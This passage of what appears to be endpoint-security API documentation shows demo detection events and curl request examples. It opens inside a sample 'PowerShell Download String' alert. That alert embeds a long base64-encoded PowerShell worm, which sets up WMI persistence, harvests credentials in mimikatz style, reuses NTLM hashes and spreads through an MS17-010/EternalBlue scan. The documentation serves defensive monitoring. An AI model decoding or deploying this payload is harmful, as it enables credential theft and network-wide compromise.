GUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==",
                  "parent_app": "WmiPrvSE.exe",
                  "parent_app_path": "C:\\Windows\\System32\\wbem",
                  "parent_pid": 2236,
                  "parent_puid": 132461352663910600,
                  "parent_user": "SYSTEM",
                  "parent_user_sid": "010100000000000512000000",
                  "pid": 10724,
                  "puid": 132465072105597400,
                  "ts": 1602033881727175700,
                  "user": "SYSTEM",
                  "user_sid": "010100000000000512000000"
                }
              }
            ],
            "limited": false,
            "matched": 1
          },
          "schema": "endpoint",
          "schema_epoch": 2,
          "sig_id": 20200719101800,
          "sig_rev": 1
        },
        "detection": "apde:20200719101800",
        "end_ts": 1620188084,
        "engine": "apde",
        "id": "cF3A8bacac",
        "name": "PowerShell Download String",
        "observables": {
          "file": [
            {
              "md5": "d683c112190f4b4c6d477d693ee88e35",
              "name": "WmiPrvSE.exe",
              "path": "C:\\Windows\\System32\\wbem",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
              "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
              "size": 425984,
              "type_id": 1
            },
            {
              "md5": "a575a7610e5f003cc36df39e07c4ba7d",
              "name": "powershell.exe",
              "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
              "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
              "size": 443392,
              "type_id": 1
            }
          ]
        },
        "remediated": false,
        "severity": "medium",
        "silent": true,
        "start_ts": 1620188084,
        "tactics": [
          "TA0002",
          "TA0005"
        ],
        "techniques": [
          "T1059"
        ],
        "type": "activity",
        "normalized": {
          "observables": {
            "file": {
              "name": [
                "wmiprvse.exe",
                "powershell.exe"
              ],
              "path": [
                "c:\\windows\\system32\\wbem",
                "c:\\windows\\system32\\windowspowershell\\v1.0"
              ]
            }
          },
          "name": "powershell download string"
        },
        "demo": true
      },
      "tactics": [
        "TA0002",
        "TA0005"
      ],
      "techniques": [
        "T1059"
      ]
    }
  ]
}

Fetch events that are newer than a given timestamp

Request

Requires Authorization
GET /v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2824
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"4a49568d9b3418374f638238a03fb03c"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&offset=10&limit=10",
      "prev": "https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=0",
      "next": "https://api.eu.amp.cisco.com/v0/events?start_date=2015-10-01T00%3A00%3A00%2B00%3A00&limit=10&offset=20"
    },
    "results": {
      "total": 975,
      "current_item_count": 10,
      "index": 10,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 6533671385032557000,
      "timestamp": 1620253659,
      "timestamp_nanoseconds": 25000000,
      "date": "2021-05-05T22:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671385032556606",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "\\\\?\\C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    },
    {
      "id": 6533671385032557000,
      "timestamp": 1620253659,
      "timestamp_nanoseconds": 14000000,
      "date": "2021-05-05T22:27:39+00:00",
      "event_type": "Threat Detected",
      "event_type_id": 1090519054,
      "detection": "W32.File.MalParent",
      "detection_id": "6533671380737589309",
      "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
      "group_guids": [
        "6a208a97-badf-4296-87c2-40779ffff0af"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "5639a4f8-76e5-4c15-9f52-12da75bc4185",
        "hostname": "Demo_AMP_Threat_Audit",
        "external_ip": "21.207.234.38",
        "user": "johndoe",
        "active": true,
        "network_addresses": [
          {
            "ip": "238.85.81.101",
            "mac": "9e:47:ce:f6:82:2c"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/5639a4f8-76e5-4c15-9f52-12da75bc4185/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "file": {
        "disposition": "Malicious",
        "file_name": "ekjrngjker.exe",
        "file_path": "C:\\ekjrngjker.exe",
        "identity": {
          "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
          "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
          "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
        }
      }
    }
  ]
}

Fetch list of events filtered by SCAN_STARTED event type

Request

Requires Authorization
GET /v0/events?event_type%5B%5D=554696714&limit=10
Headers
accept: application/json
content-type: application/json
accept-encoding: identity
authorization: Basic FILTERED

cURL Edit, then copy and paste on your terminal

curl -X GET \
-H 'accept: application/json' \
-H 'content-type: application/json' \
-H 'accept-encoding: identity' \
--compressed -H 'Accept-Encoding: gzip, deflate' \
-u YOUR_API_CLIENT_ID \
'https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10'

Response

Shortened for readability

content-type: application/json; charset=utf-8
transfer-encoding: chunked
status: 200 OK
x-ratelimit-limit: 3000
x-ratelimit-reset: 1971
referrer-policy: strict-origin-when-cross-origin
x-ratelimit-remaining: 2823
x-permitted-cross-domain-policies: none
x-download-options: noopen
etag: W/"f070de09c8399ea38ef0184b2b6ae00e"
x-frame-options: SAMEORIGIN
x-ratelimit-resetdate: 2021-05-05T23:55:49Z
strict-transport-security: max-age=31536000
{
  "version": "v0.2.2",
  "metadata": {
    "links": {
      "self": "https://api.eu.amp.cisco.com/v0/events?event_type%5B%5D=554696714&limit=10"
    },
    "results": {
      "total": 9,
      "current_item_count": 9,
      "index": 0,
      "items_per_page": 10
    }
  },
  "data": [
    {
      "id": 5832364858376454000,
      "timestamp": 1620252424,
      "timestamp_nanoseconds": 772000000,
      "date": "2021-05-05T22:07:04+00:00",
      "event_type": "Scan Started",
      "event_type_id": 554696714,
      "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
      "group_guids": [
        "af1e7d79-880b-4aaf-84d4-06149fef0cd2",
        "8f6c4774-0e8e-4546-8ebd-4e1b035473b4"
      ],
      "computer": {
        "connector_guid": "8f65c48e-e166-485e-9f0b-67460b99fa50",
        "hostname": "Demo_ZAccess",
        "external_ip": "129.92.41.205",
        "active": true,
        "network_addresses": [
          {
            "ip": "159.125.227.38",
            "mac": "bf:bc:e4:c9:d7:f1"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/8f65c48e-e166-485e-9f0b-67460b99fa50/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/6c3c2005-4c74-4ba7-8dbb-c4d5b6bafe03"
        }
      },
      "scan": {
        "description": "C:\\Program Files\\DVD Maker"
      }
    },
    {
      "id": 5832364789656977000,
